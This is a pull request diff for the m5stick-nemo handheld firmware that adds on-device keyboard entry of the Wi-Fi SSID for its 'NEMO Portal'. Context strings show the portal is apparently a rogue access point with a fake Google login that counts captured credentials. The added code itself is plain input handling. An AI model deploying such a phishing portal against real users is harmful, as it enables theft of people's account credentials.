### PR TITLE
NEMO Portal - Type SSID Using Cardputer Keyboard

### DIFF
--- a/m5stick-nemo.ino
+++ b/m5stick-nemo.ino
@@ -2,13 +2,13 @@
 // github.com/n0xa | IG: @4x0nn
 
 // -=-=-=-=-=-=- Uncomment the platform you're building for -=-=-=-=-=-=-
-#define STICK_C_PLUS
+//#define STICK_C_PLUS
 //#define STICK_C_PLUS2
 //#define STICK_C
-//#define CARDPUTER
+#define CARDPUTER
 // -=-=- Uncommenting more than one at a time will result in errors -=-=-
 
-String buildver="2.3.4";
+String buildver="2.3.5";
 #define BGCOLOR BLACK
 #define FGCOLOR GREEN
 

--- a/m5stick-nemo.ino
+++ b/m5stick-nemo.ino
@@ -2,13 +2,13 @@
 // github.com/n0xa | IG: @4x0nn
 
 // -=-=-=-=-=-=- Uncomment the platform you're building for -=-=-=-=-=-=-
-//#define STICK_C_PLUS
+#define STICK_C_PLUS
 //#define STICK_C_PLUS2
 //#define STICK_C
-#define CARDPUTER
+//#define CARDPUTER
 // -=-=- Uncommenting more than one at a time will result in errors -=-=-
 
-String buildver="2.3.3";
+String buildver="2.3.4";
 #define BGCOLOR BLACK
 #define FGCOLOR GREEN
 
@@ -627,7 +627,7 @@ int rotation = 1;
     DISP.println("%");
     DISP.println(TXT_EXIT);
   }
-  
+
   void battery_setup() { // 
     rstOverride = false;
     pinMode(VBAT_PIN, INPUT);

--- a/portal.h
+++ b/portal.h
@@ -18,6 +18,7 @@
 #define LOGIN_MESSAGE "Please log in to browse securely."
 #define LOGIN_BUTTON "Next"
 #define LOGIN_AFTER_MESSAGE "Please wait a few minutes. Soon you will be able to access the internet."
+#define TYPE_SSID_TEXT "Lenght between 2 and 32\nInvalid: ?,$,\",[,\\,],+\n\nType the SSID\nPress Enter to Confirm\n\n"
 #elif defined(LANGUAGE_PT_BR)
 #define LOGIN_TITLE "Fazer login"
 #define LOGIN_SUBTITLE "Use sua Conta do Google"
@@ -26,6 +27,7 @@
 #define LOGIN_MESSAGE "Por favor, faça login para navegar de forma segura."
 #define LOGIN_BUTTON "Avançar"
 #define LOGIN_AFTER_MESSAGE "Fazendo login..."
+#define TYPE_SSID_TEXT "Tamanho entre 2 e 32\nInvalidos: ?,$,\",[,\\,],+\n\nDigite o SSID\nEnter para Confirmar\n\n"
 #endif
 
 int totalCapturedCredentials = 0;
@@ -40,13 +42,6 @@ unsigned long bootTime = 0, lastActivity = 0, lastTick = 0, tickCtr = 0;
 DNSServer dnsServer;
 WebServer webServer(80);
 
-void setupWiFi() {
-  Serial.println("Initializing WiFi");
-  WiFi.mode(WIFI_AP);
-  WiFi.softAPConfig(AP_GATEWAY, AP_GATEWAY, IPAddress(255, 255, 255, 0));
-  WiFi.softAP(apSsidName);
-}
-
 void setSSID(String ssid){
   #if defined USE_EEPROM
   Serial.printf("Writing %d bytes of SSID to EEPROM\n", ssid.length());
@@ -60,6 +55,62 @@ void setSSID(String ssid){
   #endif
   apSsidName=ssid;
   return;
+}
+
+void confirmOrTypeSSID(){
+  DISP.fillScreen(BLACK);
+  DISP.setSwapBytes(true);
+  DISP.setTextSize(MEDIUM_TEXT);
+  DISP.setTextColor(TFT_RED, BGCOLOR);
+  DISP.setCursor(0, 0);
+  DISP.println("WiFi SSID");
+  DISP.setTextSize(TINY_TEXT);
+  DISP.setTextColor(FGCOLOR, BGCOLOR);
+  DISP.println(TYPE_SSID_TEXT);
+  DISP.setTextSize(SMALL_TEXT);
+  uint8_t ssidTextCursorY = DISP.getCursorY();
+  String currentSSID = String(apSsidName.c_str());
+  DISP.printf("%s", currentSSID.c_str());
+  bool ssid_ok = false;
+
+  while(!ssid_ok){
+    M5Cardputer.update();
+    if(M5Cardputer.Keyboard.isChange() && M5Cardputer.Keyboard.isPressed()) {
+      Keyboard_Class::KeysState status = M5Cardputer.Keyboard.keysState();
+      for(auto i : status.word) {
+        if(i != '?' && i != '$' && i != '\"' && i != '[' && i != '\\' && i != ']' && i != '+'){
+          currentSSID += i;
+        }
+      }
+      if(currentSSID.length() >= 32) {
+        continue;
+      }
+      if(status.del) {
+        currentSSID.remove(currentSSID.length() - 1);
+      }
+      if(status.enter) {
+        ssid_ok = true;
+      }
+      DISP.fillRect(0, ssidTextCursorY, DISP.width(), DISP.width()- ssidTextCursorY, BLACK);
+      DISP.setCursor(0, ssidTextCursorY);
+      DISP.printf("%s", currentSSID.c_str());
+    }
+    delay(100);
+  }
+
+  if(currentSSID.length() > 2){
+    setSSID(currentSSID);
+  }
+}
+
+void setupWiFi() {
+  Serial.println("Initializing WiFi");
+  #if defined(CARDPUTER)
+  confirmOrTypeSSID();
+  #endif // Cardputer
+  WiFi.mode(WIFI_AP);
+  WiFi.softAPConfig(AP_GATEWAY, AP_GATEWAY, IPAddress(255, 255, 255, 0));
+  WiFi.softAP(apSsidName);
 }
 
 void getSSID(){

--- a/portal.h
+++ b/portal.h
@@ -77,28 +77,27 @@ void confirmOrTypeSSID(){
     M5Cardputer.update();
     if(M5Cardputer.Keyboard.isChange() && M5Cardputer.Keyboard.isPressed()) {
       Keyboard_Class::KeysState status = M5Cardputer.Keyboard.keysState();
-      for(auto i : status.word) {
-        if(i != '?' && i != '$' && i != '\"' && i != '[' && i != '\\' && i != ']' && i != '+'){
-          currentSSID += i;
-        }
-      }
-      if(currentSSID.length() >= 32) {
-        continue;
-      }
       if(status.del) {
         currentSSID.remove(currentSSID.length() - 1);
       }
       if(status.enter) {
         ssid_ok = true;
       }
+      if(currentSSID.length() >= 32) {
+        continue;
+      }
+      for(auto i : status.word) {
+        if(i != '?' && i != '$' && i != '\"' && i != '[' && i != '\\' && i != ']' && i != '+'){
+          currentSSID += i;
+        }
+      }
       DISP.fillRect(0, ssidTextCursorY, DISP.width(), DISP.width()- ssidTextCursorY, BLACK);
       DISP.setCursor(0, ssidTextCursorY);
       DISP.printf("%s", currentSSID.c_str());
     }
-    delay(100);
   }
 
-  if(currentSSID.length() > 2){
+  if(currentSSID != apSsidName && currentSSID.length() > 2){
     setSSID(currentSSID);
   }
 }


### PR DESCRIPTION
## NEMO Portal - Type SSID Using Cardputer Keyboard
WiFi -> NEMO Portal -> Type or Confirm SSID -> Start NEMO Portal

![pr-cardputer-ssid](https://github.com/n0xa/m5stick-nemo/assets/38250184/7c04bb1e-57ef-4138-9d15-1e8197820a76)

## Features
- ifdef for Cardputer only (embedded keyboard)
- Initialize SSID text with the stored SSID (apSsidName)
- SSID Sanitization: 2 to 32 chars and invlid characters filter (?,$,",[,\,],+) following [SSID name convensions](https://www.cisco.com/assets/sol/sb/WAP321_Emulators/WAP321_Emulator_v1.0.0.3/help/Wireless05.html)
- Persisting typed valid SSID in EEPROM
- Easy to use
- Localization

